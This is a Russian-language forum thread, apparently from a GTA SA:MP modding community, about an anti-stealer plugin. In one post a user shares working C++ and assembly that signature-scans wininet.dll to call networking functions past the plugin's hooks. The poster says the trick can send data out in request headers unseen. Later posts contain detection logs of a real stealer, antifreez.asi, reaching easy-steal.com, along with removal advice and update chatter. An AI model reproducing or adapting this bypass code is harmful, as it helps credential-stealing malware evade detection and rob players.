Эксклюзив Неактуально Избранное ASI AntiStealer

[ЯedЯuM]

Сча обходы чекнем) Аж интересно стало))00

 

[™ ChipFamily]

Сча обходы чекнем) Аж интересно стало))00

Опкодер, опиши сразу все обходы которые есть, так будет лучше всего

 

[ЯedЯuM]

@DarkP1xel с наступающим тебя :)
Можно было сделать по нормальному через HttpSendRequest но мне было влом искать в ней вызовы с winhttp.dll ибо у тебя там патчит их а с InternetOpenUrl нихуяшечки, через отправку хедеров можно так слать на хост данные а там пхп скриптом их читать, фикси)))

DWORD retAddr;
__declspec(naked) void __stdcall EmulateInstructions()
{
    __asm
    {
        push ebp
        mov ebp, esp
        jmp retAddr; 
    }
}
void __stdcall TestInet()
{
    char pattern[] = { "\x83\xE4\xF8\x83\xEC\x64\xA1\x00\x00\x00\x00\x33\xC4\x89\x44\x24\x60\x8B\x45\x08\x53\x89\x44\x24\x14\x8B\x45\x14" };
    char mask[] = { "xxxxxxx????xxxxxxxxxxxxxxxxx" }; SigScan sgn; retAddr = sgn.FindPattern("wininet.dll", pattern, mask);
    DWORD DetourAddr = (DWORD)&EmulateInstructions; HINTERNET hInternet; char agent[] = { "Fuck AntiStealer" };
    __asm
    {
        pushfd
        lea eax, agent
        push 0
        push 0
        push 0
        push 1
        push eax
        call DetourAddr
        mov hInternet, eax
        popfd
    }
    char pattern2[] = { "\x83\xE4\xF8\x83\xEC\x3C\x8D\x44\x24\x04\x56\x6A\x38\x6A\x00\x50\xE8\x00\x00\x00\x00\x83\xC4\x0C\x8D\x4C\x24\x08\xE8\x00\x00\x00\x00\xFF\x75\x1C" };
    char mask2[] = { "xxxxxxxxxxxxxxxxx????xxxxxxxx????xxx" }; retAddr = sgn.FindPattern("wininet.dll", pattern2, mask2);
    char link[] = { "https://pastebin.com/raw/Cv9PSgY0" }; HINTERNET hInternetUrl;
    __asm 
    {
        pushfd 
        lea eax, link 
        push 0
        push 0
        push 0
        push 0
        push eax 
        push hInternet 
        call DetourAddr 
        mov hInternetUrl, eax 
        popfd 
    }
    DWORD len = 0; char result[1024] = {};
    if (InternetReadFile(hInternetUrl, result, sizeof(result) - 1, &len))
    {
        result[len] = 0;
        FILE *hFile = fopen("__TEST.txt", "a+");
        if (hFile)
        {
            fprintf(hFile, "%s\n", result);
            fclose(hFile);
        }
    }
    InternetCloseHandle(hInternet); InternetCloseHandle(hInternetUrl);
}

 

[666pro]

[PATCHED] > [SetFileAttributesA] > [L:\Games\GTA San Andreas MultiPlayer\antifreez.asi] > {lpFileName: L:\Games\GTA San Andreas MultiPlayer\antifreez.asi | dwFileAttributes: 6}
[WARNING] > [gethostbyname] > [L:\Games\GTA San Andreas MultiPlayer\samp.dll] > {name: 666pro}
[PATCHED] > [Process32First] > [L:\Games\GTA San Andreas MultiPlayer\antifreez.asi]
[PATCHED] > [Process32First] > [L:\Games\GTA San Andreas MultiPlayer\antifreez.asi]
[PATCHED] > [Process32First] > [L:\Games\GTA San Andreas MultiPlayer\antifreez.asi]
[PATCHED] > [Process32First] > [L:\Games\GTA San Andreas MultiPlayer\antifreez.asi]
[PATCHED] > [Process32First] > [L:\Games\GTA San Andreas MultiPlayer\antifreez.asi]
[PATCHED] > [Process32First] > [L:\Games\GTA San Andreas MultiPlayer\antifreez.asi]
[PATCHED] > [Process32First] > [L:\Games\GTA San Andreas MultiPlayer\antifreez.asi]
[PATCHED] > [Process32First] > [L:\Games\GTA San Andreas MultiPlayer\antifreez.asi]
[PATCHED] > [InternetOpenA] > [L:\Games\GTA San Andreas MultiPlayer\antifreez.asi] > {lpszAgent: easy-steal.com:asi/sf}
[PATCHED] > [Process32First] > [L:\Games\GTA San Andreas MultiPlayer\antifreez.asi]
[PATCHED] > [Process32First] > [L:\Games\GTA San Andreas MultiPlayer\antifreez.asi]
[PATCHED] > [Process32First] > [L:\Games\GTA San Andreas MultiPlayer\antifreez.asi]
[PATCHED] > [Process32First] > [L:\Games\GTA San Andreas MultiPlayer\antifreez.asi]
[PATCHED] > [Process32First] > [L:\Games\GTA San Andreas MultiPlayer\antifreez.asi]
[PATCHED] > [Process32First] > [L:\Games\GTA San Andreas MultiPlayer\antifreez.asi]
[PATCHED] > [Process32First] > [L:\Games\GTA San Andreas MultiPlayer\antifreez.asi]
[PATCHED] > [Process32First] > [L:\Games\GTA San Andreas MultiPlayer\antifreez.asi]
[PATCHED] > [InternetOpenA] > [L:\Games\GTA San Andreas MultiPlayer\antifreez.asi] > {lpszAgent: easy-steal.com:asi/sf}

Как найти и удалить стиллер? antifreez.asi смог удалить ( был скрытым файлом ), но осталось вот эта строка "[WARNING] > [gethostbyname] > [L:\Games\GTA San Andreas MultiPlayer\samp.dll] > {name: 666pro}" и не понятно какой скрипт это заразил мне

Проблема номер два, у моего друга не появляется лог файл, с чем это связано может быть? Лоадер стоит с вашего же сайта

 

[#Rin]

antifreez.asi

Это стилер.

[WARNING] > [gethostbyname] > [L:\Games\GTA San Andreas MultiPlayer\samp.dll] > {name: 666pro}

Это не стилер, это самп. Все норм.

Проблема номер два, у моего друга не появляется лог файл, с чем это связано может быть? Лоадер стоит с вашего же сайта

Игра находится в системной папке. Запускай игру от админа, или переместите папку на другой диск.

 

[666pro]

Это стилер.

Это не стилер, это самп. Все норм.

Игра находится в системной папке. Запускай игру от админа, или переместите папку на другой диск.

Спасибо, как можно определить где стиллер? Т.К. походу он скачался через время, вначале ничего не было и вот сегодня увидел только

 

[ShuffleBoy]

Спасибо, как можно определить где стиллер? Т.К. походу он скачался через время, вначале ничего не было и вот сегодня увидел только

Спасибо, как можно определить где стиллер? Т.К. походу он скачался через время, вначале ничего не было и вот сегодня увидел только

cleo/lua подкачивает значит, когда в игру входишь

 

[MAHEKEH]

Большое спасибо Пикселю, Саньку отдельная благодарность за финансовую поддержку Антистиллера, отличный подарок к 2019.

 

[666pro]

cleo/lua подкачивает значит, когда в игру входишь

Спойлер: avp protect

Ниже приложил все клео/луа/аси плагины,что из этого может быть плохим?

P.S. После удаление антифриз аси, остался только такой лог, но я так понимаю это нвидиа

[PATCHED] > [FindWindowA] > [C:\WINDOWS\system32\nvspcap.dll] > {lpClassName: - | lpWindowName: NVIDIA GeForce Overlay}
[PATCHED] > [FindWindowA] > [C:\WINDOWS\system32\nvspcap.dll] > {lpClassName: - | lpWindowName: NVIDIA GeForce Overlay}
[WARNING] > [gethostbyname] > [L:\Games\GTA San Andreas MultiPlayer\samp.dll] > {name: 666pro}

 

[ID_Heaven]

[PATCHED] > [FindWindowA] > [C:\WINDOWS\system32\nvspcap.dll] > {lpClassName: - | lpWindowName: NVIDIA GeForce Overlay}
[PATCHED] > [FindWindowA] > [C:\WINDOWS\system32\nvspcap.dll] > {lpClassName: - | lpWindowName: NVIDIA GeForce Overlay}
[WARNING] > [gethostbyname] > [L:\Games\GTA San Andreas MultiPlayer\samp.dll] > {name: 666pro}

если это всё, что показал лог, значит стиллеров нет, а в луа и быть их не может

Возможно у тебя ничего не установлено, что может делать что то нежелательное.

таир, я даже спецом стиллер поставил, ничего в лог не вывело, всё такой же пустой

 

[Sire Like]

Ну что же... Обещал Вам, что сделаю 5.0.0 и сделал. Тема снова актуальна и открыта. Спасибо всем кто отправлял пожертвования на разработку. Многим наверное будет интересно, сколько накопилось за 2 месяца разработки новой версии. Собственно ни-ху-я, а точнее 1120р. Как стало понятно из всего этого цирка, AS нужен только @sanєk, который вложил чуть ли не все собранные деньги в обновление. Копилка останется открытой и любой желающий сможет пожертвовать туда свои накопления на поддержку разработки. Поздравляю всех с Наступающим Новым Годом :monkey:!

Обновлено до: V5.0.0

ну я не знал что ты копишь на 10 кубов смолы, так бы скинул

 

[DarkP1xel]

на более старых версиях идут варнинги (в лохге)

Напиши мне в ВК.

 

[Losososo]

если это всё, что показал лог, значит стиллеров нет, а в луа и быть их не может
Может, вот @rraggerr делал кому-то то ли за 500, то ли за 250.

ну я не знал что ты копишь на 10 кубов смолы, так бы скинул

Так копилка все еще открыта)

 

[Denis_Kuzo]

Плагин поддерживает автообновление версии? Просто у меня антистиллер версии 4.9.5 не обновился до 5.0.0....

 

[Losososo]

Плагин поддерживает автообновление версии? Просто у меня антистиллер версии 4.9.5 не обновился до 5.0.0....

Нет, надо в ручную смотреть тему и как только обновится АС, обновлять его.